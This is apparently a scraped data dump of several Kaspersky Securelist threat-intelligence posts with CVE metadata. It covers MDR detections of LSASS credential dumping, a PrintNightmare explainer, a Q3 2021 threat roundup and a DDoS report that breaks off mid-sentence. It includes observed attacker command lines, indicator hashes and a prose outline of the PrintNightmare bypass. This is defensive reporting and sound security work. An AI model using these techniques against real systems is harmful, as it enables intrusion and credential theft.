\nC:\\Windows\\System32\\svchost.exe -k \nDcomLaunchProcess logon type: 3 (Network logon) | Remotely executed \nprocess memory dump \nwas detected by AM \nengine \n**616** is LSASS process \nPID \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Create section (load DLL) \nExecute section (run DLL) | DLL name: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe \nProcess PID: **616** \nParent process: command line: C:\\Windows\\System32\\wininit.exe \nProcess integrity level: System | Unknown DLL was loaded and executed within lsass.exe \n**T1003.001:** \nOS Credential Dumping: LSASS Memory | Inexact AV detect | Internal AV verdict: The file is Security Support \nProvider (SSP) \nFile path: C:\\programdata\\english1.dll \nProcess: C:\\Windows\\System32\\lsass.exe | Unknown DLL loaded to lsass is SSP \n**T1053.005:** \nScheduled Task/Job: Scheduled Task | Create process | Process command line: \nC:\\programdata\\InEnglish.exe g2@j5js1 \n0sdfs,48 C:\\programdata\\EnglishEDouble C:\\programdata\\EnglishDDouble \n**C:\\programdata**\\English1.dll \nC:\\programdata\\English.dmp \nParent process command line: \ntaskeng.exe {7725474B-D9EA-473D-B10D- \nAC0572A0AA70} S-1-5-18:NT \nAUTHORITY\\System:Service: \nGrandparent process command line: \nC:\\Windows\\System32\\svchost.exe -k netsvcs \nProcess integrity level: System \nProcess user SID: S-1-5-18 | Suspicious executable from C:\\programdata run as scheduled task under _System_ privileges \n \nObserved malicious files:\n\nc:\\programdata\\e.zip | 0x37630451944A1DD027F5A9B643790B10 \n---|--- \nc:\\programdata\\es.zip | 0x3319BD8B628F8051506EE8FD4999C4C3 \nc:\\programdata\\m.zip | 0xC15D90F8374393DA2533BAF7359E31F9 \nc:\\programdata\\inenglish.exe | 0xCB15B1F707315FB61E667E0218F7784D \nc:\\programdata\\english1.dll | 0x358C5061B8DF0E0699E936A0F48EAFE1 \nc:\\windows\\cluster\\resource.exe | 0x872A776C523FC33888C410081A650070 \nc:\\windows\\cluster\\twindump.dll | 0xF980FD026610E4D0B31BAA5902785EDE \n \n## Conclusion\n\nAttackers follow trends. They use any loophole to break into your corporate network. Sometimes they learn about new vulnerabilities in products earlier than security researchers do. Sometimes they hide so skillfully that their actions are indistinguishable from those of your employees or administrators.\n\nCountering targeted attacks requires extensive experience as well as constant learning. Kaspersky Managed Detection and Response delivers fully managed, individually tailored ongoing detection, prioritization, investigation, and response. As a result, it provides all the major benefits from having your own security operations center without having to actually set one up.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-15T10:00:42", "type": "securelist", "title": "Kaspersky Managed Detection and Response: interesting cases", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-12-15T10:00:42", "id": "SECURELIST:830DE5B1B5EBB6AEE4B12EF66AD749F9", "href": "https://securelist.com/kaspersky-managed-detection-and-response-interesting-cases/105214/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:23", "description": "\n\n## Summary\n\nLast week Microsoft warned Windows users about vulnerabilities in the Windows Print Spooler service \u2013 CVE-2021-1675 and CVE-2021-34527 (also known as PrintNightmare). Both vulnerabilities can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers.\n\nKaspersky products protect against attacks leveraging these vulnerabilities. The following detection names are used:\n\n * HEUR:Exploit.Win32.CVE-2021-1675.*\n * HEUR:Exploit.Win32.CVE-2021-34527.*\n * HEUR:Exploit.MSIL.CVE-2021-34527.*\n * HEUR:Exploit.Script.CVE-2021-34527.*\n * HEUR:Trojan-Dropper.Win32.Pegazus.gen\n * PDM:Exploit.Win32.Generic\n * PDM:Trojan.Win32.Generic\n * Exploit.Win32.CVE-2021-1675.*\n * Exploit.Win64.CVE-2021-1675.*\n\nOur detection logic is also successfully blocks attack technique from the latest Mimikatz framework v. 2.2.0-20210707.\n\nWe are closely monitoring the situation and improving generic detection of these vulnerabilities using our [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and Exploit Prevention components. As part of our [Managed Detection and Response service](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) Kaspersky SOC experts are able to detect exploitation of these vulnerabilities, investigate such attacks and report to customers.\n\n## Technical details\n\n### CVE-2021-34527\n\nWhen using RPC protocols to add a new printer (_RpcAsyncAddPrinterDriver [MS-PAR] or RpcAddPrinterDriverEx [MS-RPRN]_) a client has to provide multiple parameters to the Print Spooler service:\n\n * _pDataFile_ - a path to a data file for this printer;\n * _pConfigFile_ - a path to a configuration file for this printer;\n * _pDriverPath_ - a path to a driver file that's used by this printer while it's working.\n\nThe service makes several checks to ensure _pDataFile_ and _pDriverPath_ are not UNC paths, but there is no corresponding check for pConfigFile, meaning the service will copy the configuration DLL to the folder _%SYSTEMROOT%\\system32\\spool\\drivers\\x64\\3\\_ (on x64 versions of the OS).\n\nNow, if the Windows Print Spooler service tries to add a printer again, but this time sets pDataFile to the copied DLL path (from the previous step), the print service will load this DLL because its path is not a UNC path, and the check will be successfully passed. These methods can be used by a low-privileged account, and the DLL is loaded by the _NT AUTHORITY\\SYSTEM group_ process.\n\n### CVE-2021-1675\n\nThe local version of PrintNightmare uses the same method for exploitation as CVE-2021-34527, but there's a difference in the entrypoint function (_AddPrinterDriverEx_). This means an attacker can place a malicious DLL in any locally accessible directory to run the exploit.\n\n## Mitigations\n\nKaspersky experts anticipate a growing number of exploitation attempts to gain access to resources inside corporate perimeters accompanied by a high risk of ransomware infection and data theft.\n\nTherefore, it is strongly recommended to follow Microsoft [guidelines](<https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-print-spooler>) and apply the latest security updates for Windows.\n\nQuoting Microsoft (as of July 7th, 2021): \n_"Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object (GPO). \nWhile this security assessment focuses on domain controllers, any server is potentially at risk to this type of attack."_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-08T05:00:06", "type": "securelist", "title": "Quick look at CVE-2021-1675 & CVE-2021-34527 (aka PrintNightmare)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-08T05:00:06", "id": "SECURELIST:0C07A61E6D92865F5B58728A60866991", "href": "https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T14:36:44", "description": "\n\n * **IT threat evolution Q3 2021**\n * [IT threat evolution in Q3 2021. PC statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-pc-statistics/104982/>)\n * [IT threat evolution in Q3 2021. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2021-mobile-statistics/105020/>)\n\n## Targeted attacks\n\n### WildPressure targets macOS\n\nLast March, we reported a [WildPressure campaign targeting industrial-related entities in the Middle East](<https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/>). While tracking this threat actor in spring 2021, we discovered a newer version. It contains the C++ Milum Trojan, a corresponding VBScript variant and a set of modules that include an orchestrator and three plugins. This confirms our previous assumption that there were more last-stagers besides the C++ ones.\n\nAnother language used by WildPressure is Python. The PyInstaller module for Windows contains a script named "Guard". Interestingly, this malware was developed for both Windows and macOS operating systems. The coding style, overall design and C2 communication protocol is quite recognizable across all three programming languages used by the authors.\n\nWildPressure used both virtual private servers (VPS) and compromised servers in its infrastructure, most of which were WordPress websites.\n\nWe have very limited visibility for the samples described in our report, but our telemetry suggests that the targets in this campaign were also from the oil and gas industry.\n\nYou can view our report on the new version [here](<https://securelist.com/wildpressure-targets-macos/103072/>), together with a video presentation of our findings.\n\n### LuminousMoth: sweeping attacks for the chosen few\n\nWe recently uncovered a large-scale and highly active attack against targets in Southeast Asia by a threat actor that we call [LuminousMoth](<https://securelist.com/apt-luminousmoth/103332/>). The campaign dates back to October last year and was still ongoing at the time we published our public report in July. Most of the early sightings were in Myanmar, but it seems the threat actor is now much more active in the Philippines. Targets include high-profile organizations: namely, government entities located both within those countries and abroad.\n\nMost APT threats carefully select their targets and tailor the infection vectors, implants and payloads to the victims' identities or environment. It's not often we observe a large-scale attack by APT threat actors \u2013 they usually avoid such attacks because they are too 'noisy' and risk drawing attention to the campaign. LuminousMoth is an exception. We observed a high number of infections; although we think the campaign was aimed at a few targets of interest.\n\nThe attackers obtain initial access to a system by sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document. The archive contains two malicious DLL libraries as well as two legitimate executables that side-load the DLL files. We found multiple archives like this with file names of government entities linked to Myanmar.\n\nWe also observed a second infection vector that comes into play after the first one has successfully finished. The malware tries to spread to other hosts on the network by infecting USB drives.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12153755/LuminousMoth_01.png>)\n\nIn addition to the malicious DLLs, the attackers also deployed a signed, but fake version of the popular application Zoom on some infected systems, enabling them to exfiltrate data.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/12154002/LuminousMoth_05.png>)\n\nThe threat actor also deploys an additional tool that accesses a victim's Gmail session by stealing cookies from the Chrome browser.\n\nInfrastructure ties as well as shared TTPs allude to a possible connection between LuminousMoth and the HoneyMyte threat group, which has been seen targeting the same region using similar tools in the past.\n\n### Targeted attacks exploiting CVE-2021-40444\n\nOn September 7, [Microsoft reported a zero-day vulnerability](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) (CVE-2021-40444) that could allow an attacker to execute code remotely on vulnerable computers. The vulnerability is in MSHTML, the Internet Explorer engine. Even though few people use IE nowadays, some programs use its engine to handle web content \u2013 in particular, Microsoft Office applications.\n\nWe [have seen targeted attacks](<https://securelist.com/exploitation-of-the-cve-2021-40444-vulnerability-in-mshtml/104218/>) exploiting the vulnerability to target companies in research and development, the energy sector and other major industries, banking, the medical technology sector, as well as telecoms and IT.\n\nTo exploit the vulnerability, attackers embed a special object in a Microsoft Office document containing a URL for a malicious script. If the victim opens the document, Microsoft Office downloads the script and runs it using the MSHTML engine. Then the script can use ActiveX controls to perform malicious actions on the victim's computer.\n\n### Tomiris backdoor linked to SolarWinds attack\n\nThe SolarWinds incident last December stood out because of the extreme carefulness of the attackers and the high-profile nature of their victims. The evidence suggests that the threat actor behind the attack, DarkHalo (aka Nobelium), had spent six months inside OrionIT's networks to perfect their attack. The following timeline sums up the different steps of the campaign.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145035/SAS_story_Tomiris_connection_01.png>)\n\nIn June, more than six months after DarkHalo had gone dark, we observed the DNS hijacking of multiple government zones of a CIS member state that allowed the attacker to redirect traffic from government mail servers to computers under their control \u2013 probably achieved by obtaining credentials to the control panel of the victims' registrar. When victims tried to access their corporate mail, they were redirected to a fake copy of the web interface.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/27145115/SAS_story_Tomiris_connection_02.png>)\n\nAfter this, they were tricked into downloading previously unknown malware. The backdoor, dubbed Tomiris, bears a number of similarities to the second-stage malware, Sunshuttle (aka GoldMax), used by DarkHalo last year. However, there are also a number of overlaps between Tomiris and Kazuar, a backdoor that has been linked to the Turla APT threat actor. None of the similarities is enough to link Tomiris and Sunshuttle with sufficient confidence. However, taken together they suggest the possibility of common authorship or shared development practices.\n\nYou can read our analysis [here](<https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/>).\n\n### GhostEmperor\n\nEarlier this year, while investigating the rise of attacks against Exchange servers, we noticed a recurring cluster of activity that appeared in several distinct compromised networks. We attribute the activity to a previously unknown threat actor that we have called [GhostEmperor](<https://securelist.com/ghostemperor-from-proxylogon-to-kernel-mode/104407/>). This cluster stood out because it used a formerly unknown Windows kernel mode rootkit that we dubbed Demodex; and a sophisticated multi-stage malware framework aimed at providing remote control over the attacked servers.\n\nThe rootkit is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150203/Ghost_Emperor_06.png>)\n\nWe identified multiple attack vectors that triggered an infection chain leading to the execution of the malware in memory. The majority of GhostEmperor infections were deployed on public-facing servers, as many of the malicious artefacts were installed by the httpd.exe Apache server process, the w3wp.exe IIS Windows server process, or the oc4j.jar Oracle server process. This means that the attackers probably abused vulnerabilities in the web applications running on those systems, allowing them to drop and execute their files.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/29150042/Ghost_Emperor_04.png>)\n\nAlthough infections often start with a BAT file, in some cases the known infection chain was preceded by an earlier stage: a malicious DLL that was side-loaded by wdichost.exe, a legitimate Microsoft command line utility (originally called MpCmdRun.exe). The side-loaded DLL then proceeds to decode and load an additional executable called license.rtf. Unfortunately, we did not manage to retrieve this executable, but we saw that the consecutive actions of loading it included the creation and execution of GhostEmperor scripts by wdichost.exe.\n\nThis toolset was in use from as early as July 2020, mainly targeting Southeast Asian entities, including government agencies and telecoms companies.\n\n### FinSpy: analysis of current capabilities\n\nAt the end of September, at the Kaspersky [Security Analyst Summit](<https://thesascon.com/>), our researchers provided an [overview of FinSpy](<https://securelist.com/finspy-unseen-findings/104322/>), an infamous surveillance toolset that several NGOs have repeatedly reported being used against journalists, political dissidents and human rights activists. Our analysis included not only the Windows version of FinSpy, but also Linux and macOS versions, which share the same internal structure and features.\n\nAfter 2018, we observed falling detection rates for FinSpy for Windows. However, it never actually went away \u2013 it was simply using various first-stage implants to hide its activities. We started detecting some suspicious backdoored installer packages (including TeamViewer, VLC Media Player and WinRAR); then in the middle of 2019 we found a host that served these installers along with FinSpy Mobile implants for Android.\n\nThe authors have gone to great lengths to make FinSpy inaccessible to security researchers \u2013 it seems they have put as much work into anti-analysis and obfuscation as they have into the Trojan itself. First, the samples are protected with multiple layers of evasion tactics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/24151828/SAS_story_FinFisher_02.png>)\n\nMoreover, once the Trojan has been installed, it is heavily camouflaged using four complex, custom-made obfuscators.\n\nApart from Trojanized installers, we also observed infections involving use of a UEFI (Unified Extensible Firmware Interface) and MBR (Master Boot Record) bootkit. While the MBR infection has been known since at least 2014, details on the UEFI bootkit were publicly revealed for the first time in our private report on FinSpy.\n\nThe user of a smartphone or tablet can be infected through a link in a text message. In some cases (for example, if the victim's iPhone has not been not [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)), the attacker may need physical access to the device.\n\n## Other malware\n\n### REvil attack on MSPs and their customers worldwide\n\nAn attack perpetrated by the REvil Ransomware-as-a-Service gang (aka Sodinokibi) targeting Managed Service Providers (MSPs) and their clients was discovered on July 2.\n\nThe attackers [identified and exploited](<https://threatpost.com/kaseya-patches-zero-day-exploits/167548/>) a zero-day vulnerability in the Kaseya Virtual System/Server Administrator (VSA) platform. The VSA software, used by Kaseya customers to remotely monitor and manage software and network infrastructure, is supplied either as a cloud service or via on-premises VSA servers.\n\nThe exploit involved deploying a malicious dropper via a PowerShell script. The script disabled Microsoft Defender features and then used the certutil.exe utility to decode a malicious executable (agent.exe) that dropped an older version of Microsoft Defender, along with the REvil ransomware packed into a malicious library. That library was then loaded by the legitimate MsMpEng.exe by utilizing the DLL side-loading technique.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/05113533/02-revil-attacks-msp.png>)\n\nThe attack is estimated to have resulted in the encryption of files belonging to around 60 Kaseya customers using the on-premises version of the platform. Many of them were MSPs who use VSA to manage the networks of other businesses. This MSP connection gave REvil access to those businesses, and Kaseya estimated that [around 1,500 downstream businesses were affected](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021>).\n\nUsing our Threat Intelligence service, we observed more than 5,000 attack attempts in 22 countries by the time [our analysis of the attack](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) was published.\n\n### What a [Print]Nightmare\n\nEarly in July, Microsoft published an alert about vulnerabilities in the Windows Print Spooler service. The vulnerabilities, [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1675>) and [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>) (aka PrintNightmare), can be used by an attacker with a regular user account to take control of a vulnerable server or client machine that runs the Windows Print Spooler service. This service is enabled by default on all Windows clients and servers, including domain controllers, making both vulnerabilities potentially very dangerous.\n\nMoreover, owing to a misunderstanding between teams of researchers, a [proof-of-concept](<https://encyclopedia.kaspersky.com/glossary/poc-proof-of-concept/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (PoC) exploit for PrintNightmare was [published](<https://therecord.media/poc-released-for-dangerous-windows-printnightmare-bug/>) online. The researchers involved believed that Microsoft's Patch Tuesday release in June had already solved the problem, so they shared their work with the expert community. However, while Microsoft had published a patch for CVE-2021-1675, the PrintNightmare vulnerability remained unpatched until July. The PoC was quickly removed, but not before it had been copied multiple times.\n\nCVE-2021-1675 is a [privilege elevation](<https://encyclopedia.kaspersky.com/glossary/privilege-escalation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) vulnerability, allowing an attacker with low access privileges to craft and use a malicious DLL file to run an exploit and gain higher privileges. However, that is only possible if the attacker already has direct access to the vulnerable computer in question.\n\nCVE-2021-34527 is significantly more dangerous because it is a [remote code execution](<https://encyclopedia.kaspersky.com/glossary/remote-code-execution-rce/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) (RCE) vulnerability, which means it allows remote injection of DLLs.\n\nYou can find a more detailed technical description of both vulnerabilities [here](<https://securelist.com/quick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare/103123/>).\n\n### Grandoreiro and Melcoz arrests\n\nIn July, the Spanish Ministry of the Interior [announced](<http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853>) the arrest of 16 people connected to the [Grandoreiro and Melcoz (aka Mekotio) cybercrime groups](<https://securelist.com/arrests-of-members-of-tetrade-seed-groups-grandoreiro-and-melcoz/103366/>). Both groups are originally from Brazil and form part of the [Tetrade umbrella](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), operating for a few years now in Latin America and Western Europe.\n\nThe Grandoreiro banking Trojan malware family initially started its operations in Brazil and then expanded its operations to other Latin American countries and then to Western Europe. The group has regularly improved its techniques; and, based on our analysis of the group's campaigns, it operates as a [malware-as-a-service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) project. Our telemetry shows that, since January 2020, Grandoreiro has mainly attacked victims in Brazil, Mexico, Spain, Portugal and Turkey.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175031/tetrade_arrest_01.png>)\n\nMelcoz had been active in Brazil since at least 2018, before expanding overseas. We observed the group attacking assets in Chile in 2018 and, more recently, in Mexico: it's likely that there are victims in other countries too, as some of the targeted banks have international operations. As a rule, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. The malware steals passwords from browsers and from the device's memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module. Our telemetry confirms that, since January 2020, Melcoz has been actively targeting Brazil, Chile and Spain, among other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/07/14175038/tetrade_arrest_02.png>)\n\nSince both malware families are from Brazil, the individuals arrested in Spain are just operators. So, it's likely that the creators of Grandoreiro and Melcoz will continue to develop new malware techniques and recruit new members in their countries of interest.\n\n### Gamers beware\n\nEarlier this year, we discovered an ad in an underground forum for a piece of malware dubbed BloodyStealer by its creators. The malware is designed to steal passwords, cookies, bank card details, browser auto-fill data, device information, screenshots, desktop and client uTorrent files, Bethesda, Epic Games, GOG, Origin, Steam, Telegram, and VimeWorld client sessions and logs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141037/bloodystealer-and-gaming-accounts-in-darknet-screen-1.png>)\n\n**_The BloodyStealer ad (Source: [https://twitter.com/3xp0rtblog](<https://twitter.com/3xp0rtblog/status/1380087553676697617>))_**\n\nThe authors of the malware, which has hit users in Europe, Latin America and the Asia-Pacific region, have adopted a MaaS distribution model, meaning that anyone can buy it for the modest price of around $10 per month (roughly $40 for a "lifetime license").\n\nOn top of its theft functions, the malware includes tools to thwart analysis. It sends stolen information as a ZIP archive to the C2 (command-and-control) server, which is protected against DDoS (distributed denial of service) attacks. The cybercriminals use either the (quite basic) control panel or Telegram to obtain the data, including gamer accounts.\n\nBloodyStealer is just one of many tools available on the dark web for stealing gamer accounts. Moreover, underground forums often feature ads offering to post a malicious link on a popular website or selling tools to generate phishing pages automatically. Using these tools, cybercriminals can collect, and then try to monetize, a huge amount of credentials. All kinds of offers related to gamer accounts can be found on the dark web.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141127/bloodystealer-and-gaming-accounts-in-darknet-screen-2.png>)\n\nSo-called logs are among the most popular. These are databases containing reams of data for logging into accounts. In their ads, attackers can specify the types of data, the geography of users, the period over which the logs were collected and other details. For example, in the screenshot below, an underground forum member offers an archive with 65,600 records, of which 9,000 are linked to users from the US, and 5,000 to residents of India, Turkey and Canada. The entire archive costs $150 (that's about 0.2 cents per record).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/11/16141203/bloodystealer-and-gaming-accounts-in-darknet-screen-3.png>)\n\nCybercriminals can also use compromised gaming accounts to launder money, distribute phishing links and conduct other illegal business.\n\nYou can read more about gaming threats, including BloodyStealer, [here](<https://securelist.com/game-related-cyberthreats/103675/>) and [here](<https://securelist.com/bloodystealer-and-gaming-assets-for-sale/104319/>).\n\n### Triada Trojan in WhatsApp mod\n\nNot everyone is happy with the official WhatsApp app, turning instead to modified WhatsApp clients for features that the WhatsApp developers haven't yet implemented in the official version. The creators of these mods often embed ads in them. However, their use of third-party ad modules can provide a mechanism for malicious code to be slipped into the app unnoticed.\n\nThis happened recently with FMWhatsApp, a popular WhatsApp mod. In version 16.80.0 the developers used a third-party ad module that includes the Triada Trojan (detected by Kaspersky's mobile antivirus as Trojan.AndroidOS.Triada.ef). This Trojan performs an intermediary function. First, it collects data about the user's device, and then, depending on the information, it downloads one of several other Trojans. You can find a description of the functions that these other Trojans perform in [our analysis of the infected FMWhatsApp mod](<https://securelist.com/triada-trojan-in-whatsapp-mod/103679/>).\n\n### Qakbot banking Trojan\n\nQakBot (aka QBot, QuackBot and Pinkslipbot) is a banking Trojan that was first discovered in 2007, and has been continually maintained and developed since then. It is now one of the leading banking Trojans around the globe. Its main purpose is to steal banking credentials (e.g., logins, passwords, etc.), but it has also acquired functionality allowing it to spy on financial operations, spread itself and install ransomware in order to maximize revenue from compromised organizations.\n\nThe Trojan also includes the ability to log keystrokes, backdoor functionality, and techniques to evade detection. The latter includes virtual environment detection, regular self-updates and cryptor/packer changes. QakBot also tries to protect itself from being analyzed and debugged by experts and automated tools. Another interesting piece of functionality is the ability to steal emails: these are later used by the attackers to send targeted emails to the victims, with the information obtained used to lure victims into opening those emails.\n\nQakBot is known to infect its victims mainly via spam campaigns. In some cases, the emails are delivered with Microsoft Office documents or password-protected archives with documents attached. The documents contain macros and victims are prompted to open the attachments with claims that they contain important information (e.g., an invoice). In some cases, the emails contain links to web pages distributing malicious documents.\n\nHowever, there is another infection vector that involves a malicious QakBot payload being transferred to the victim's machine via other malware on the compromised machine. The initial infection vectors may vary depending on what the threat actors believe has the best chance of success for the targeted organization(s). It's known that various threat actors perform reconnaissance of target organizations beforehand to decide which infection vector is most suitable.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01145837/Qakbot_technical_analysis_01.png>)\n\nWe analyzed statistics on QakBot attacks collected from our Kaspersky Security Network (KSN), where anonymized data voluntarily provided by Kaspersky users is accumulated and processed. In the first seven months of 2021 our products detected 181,869 attempts to download or run QakBot. This number is lower than the detection number from January to July 2020, though the number of users affected grew by 65% \u2013 from 10,493 in the previous year to 17,316 this year.\n\n_Number of users affected by QakBot attacks from January to July in 2020 and 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/09/01155141/01-en-qakbot.png>))_\n\nYou can read our full analysis [here](<https://securelist.com/qakbot-technical-analysis/103931/>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-26T12:00:36", "type": "securelist", "title": "IT threat evolution Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-40444"], "modified": "2021-11-26T12:00:36", "id": "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "href": "https://securelist.com/it-threat-evolution-q3-2021/104876/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T11:28:01", "description": "\n\n## News roundup\n\nQ4 2021 saw the appearance of several new DDoS botnets. A zombie network, [named Abcbot](<https://securityaffairs.co/wordpress/124542/security/abcbot-ddos-botnet-linux.html>) by researchers, first hit the radar in July, but at the time it was little more than a simple scanner attacking Linux systems by brute-forcing weak passwords and exploiting known vulnerabilities. In October, the botnet was upgraded with DDoS functionality. Then in December, researchers at Cado Security linked the botnet to the Xanthe [cryptojacking](<https://encyclopedia.kaspersky.com/glossary/cryptojacking/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) group. This is further evidence that the same botnets are often used for mining and DDoS.\n\nThe EwDoor botnet, which first came to researchers' attention in late October, [turned out to be more picky](<https://blog.netlab.360.com/warning-ewdoor-botnet-is-attacking-att-customers/>) than Abcbot. This zombie network consists solely of EdgeMarc Enterprise Session Border Controller devices located on AT&T carrier networks. The bot infiltrated the devices through the [CVE-2017-6079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6079>) vulnerability, which allows execution of arbitrary commands. By exploiting a bug in the bot itself (one of the first versions accessed a non-existent C2 server registered by researchers), Netlab 360 managed to detect 5,700 infected devices. However, the cybercriminals later severed communication with this server. AT&T is [investigating](<https://therecord.media/att-takes-action-against-ddos-botnet-that-hijacked-voip-servers/>) attacks on EdgeMarc devices.\n\nIn November, Qrator Labs [recorded](<https://habr.com/ru/company/qrator/blog/593741/>) a series of short but powerful attacks on its systems and those of its clients. The attackers used a TCP data flood: they established a TCP connection to the victim's server, then flooded it with random heavy TCP packets. In some cases, DNS amplification was also used. The attacks, launched from thousands of cameras and routers, lasted 